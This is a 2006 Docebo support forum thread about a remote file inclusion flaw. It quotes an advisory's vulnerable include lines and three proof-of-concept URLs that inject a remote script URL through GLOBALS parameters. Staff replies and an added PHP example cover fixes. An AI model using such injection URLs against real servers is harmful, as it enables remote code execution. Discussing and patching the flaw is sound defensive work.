Stewart David

Written on : 18/09/2006 19:55 ( more than one month )
Object : security: has this problem been fixed?

I found this on the internet while I was searching for information on how to customize docebo (still don't know how to customize it)

 

http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046720.html

1) Description:

Error occurred in news_class.php,

include_once($GLOBALS['where_framework']."/lib/lib.listview.php");

include_once($GLOBALS['where_framework']."/lib/lib.treedb.php");

include_once($GLOBALS['where_framework']."/lib/lib.treeview.php");

Error occurred in content_class.php,

include_once($GLOBALS['where_framework']."/lib/lib.listview.php");

include_once($GLOBALS['where_framework']."/lib/lib.treedb.php");

include_once($GLOBALS['where_framework']."/lib/lib.treeview.php");

Error occurred in util.media.php,

include_once($GLOBALS["where_cms"]."/admin/modules/media/media_class.php");

Users can include a remote file because $GLOBALS['where_framework'] and $GLOBALS['where_cms'] aren't sanitized.

2) Proof of concept:

http://example/doceboCms/[dc_path]admin/modules/news/news_class.php?GLOBALS[where_framework]=[cmd_url]

http://example/doceboCms/[dc_path]admin/modules/content/content_class.php?GLOBALS[where_framework]=[cmd_url]

http://example/doceboCms/[dc_path]admin/modules/block_media/util.media.php?GLOBALS[where_cms]=[cmd_url]

3) Solution:

Include the file where $GLOBALS[*] are declared.

 
Erba Claudio

Written on : 18/09/2006 21:02 ( more than one month )
Object : Re: security: has this problem been fixed?

Hello Dave,

Regarding the security fix, I think that all has been fixed with 3.0.4, but ... this is not Docebo's fault but PHP's fault. We had to correct it, and the proof of concept works only on vulnerable servers with safe mode set to off.
So, if you have:

  • a vulnerable server with safe_mode set to ON
  • a non-vulnerable server

a non-patched version of Docebo will not be affected.

If your server is vulnerable and Docebo is not patched, you will be affected. But it is a PHP vulnerability, not a Docebo vulnerability.

Regarding the customization, you have to work only on CSS files.
Ciao
Claudio

Docebo CEO and Founder
www.docebo.com
 
Fabio Pirovano

Written on : 18/09/2006 22:00 ( more than one month )
Object : Re: security: has this problem been fixed?

The right param to check is register_globals, not safe_mode; a server is vulnerable only if register_globals is on.
In any case, PHP fixed this bug in PHP 4.4.1 or PHP 5.0.4 or later.
I also remember a fix for version 4.3.10, but I'm not sure.

Ciao
    Fabio

Docebo Staff

 - Docebo 4 released! -
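
Added example, not part of the thread and not Docebo's code: a PHP illustration of two defenses for the include pattern quoted in the first post, rejecting any request that carries a `GLOBALS` key and resolving library files against a root fixed in code instead of `$GLOBALS['where_framework']`. The names `DOCEBO_FRAMEWORK_ROOT`, `request_overwrites_globals()` and `framework_lib()` and the demo directory are assumptions made for illustration.

```php
<?php
// Added example, not Docebo code. DOCEBO_FRAMEWORK_ROOT, request_overwrites_globals()
// and framework_lib() are hypothetical names; the demo tree below is constructed.

// True when any request source carries a "GLOBALS" key (?GLOBALS[where_framework]=...).
function request_overwrites_globals(array ...$sources): bool
{
    foreach ($sources as $source) {
        if (array_key_exists('GLOBALS', $source)) {
            return true;
        }
    }
    return false;
}

// Resolve a library file against a root fixed in code; returns its real path or null.
function framework_lib(string $trustedRoot, string $name): ?string
{
    // Plain file names only: no slashes, no URL scheme.
    if (!preg_match('/^[A-Za-z0-9_.-]+\.php$/', $name)) {
        return null;
    }
    $libDir = realpath($trustedRoot . '/lib');
    $file   = realpath($trustedRoot . '/lib/' . $name);
    if ($libDir === false || $file === false) {
        return null;
    }
    // Containment: the resolved file must sit directly in the resolved lib directory.
    return dirname($file) === $libDir ? $file : null;
}

// Constructed demo: a throwaway framework tree under the temp directory.
$root = sys_get_temp_dir() . '/framework_demo_' . getmypid();
is_dir($root . '/lib') || mkdir($root . '/lib', 0700, true);
file_put_contents($root . '/lib/lib.listview.php', "<?php // constructed stub\n");
define('DOCEBO_FRAMEWORK_ROOT', $root); // set once at bootstrap, never from input

// Constructed request with the parameter shape used in the proof of concept.
$get = ['GLOBALS' => ['where_framework' => '[cmd_url]']];
if (request_overwrites_globals($get, [], [])) {
    echo "rejected: request tries to set GLOBALS\n"; // a real entry script would stop here
}
foreach (['lib.listview.php', '../config.php'] as $name) {
    $path = framework_lib(DOCEBO_FRAMEWORK_ROOT, $name);
    echo $name . ' => ' . ($path ?? 'refused') . "\n";
}
```

In an application the `GLOBALS` check would run on `$_GET`, `$_POST` and `$_COOKIE` at the top of every directly reachable script, before any `include_once`.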
 
Stewart David

Written on : 19/09/2006 00:34 ( more than one month )
Object : Re: security: has this problem been fixed?

Thank you for responding.

The host is using php 4.4.4 so, according to Fabio, it should be ok.

Php version 4.4.4, mysql 4.0.27, apache 1.3.37 (unix)
"safe_mode" configuration Off
Configuration of "register_global" On
Configuration of "magic_quotes_gpc" On
 
Erba Claudio

Written on : 19/09/2006 09:23 ( more than one month )
Object : Re: security: has this problem been fixed?

Hi Dave

To be completely sure, try our test package :-)
Claudio

Docebo CEO and Founder
www.docebo.com
 
Stewart David

Written on : 22/09/2006 17:30 ( more than one month )
Object : Re: security: has this problem been fixed?

Actually, I did run the globals rewrite test that you posted on the news page before I found the site that had this security problem. I didn't know that this was the same problem.

The test gave me the green :)  so everything is ok.

 

 
Erba Claudio

Written on : 22/09/2006 18:31 ( more than one month )
Object : Re: security: has this problem been fixed?
Both tests? ;-)
Claudio
Docebo CEO and Founder
www.docebo.com
 
Stewart David

Written on : 22/09/2006 18:55 ( more than one month )
Object : Re: security: has this problem been fixed?

Yes, I just tried it again. Both give green :)

 

 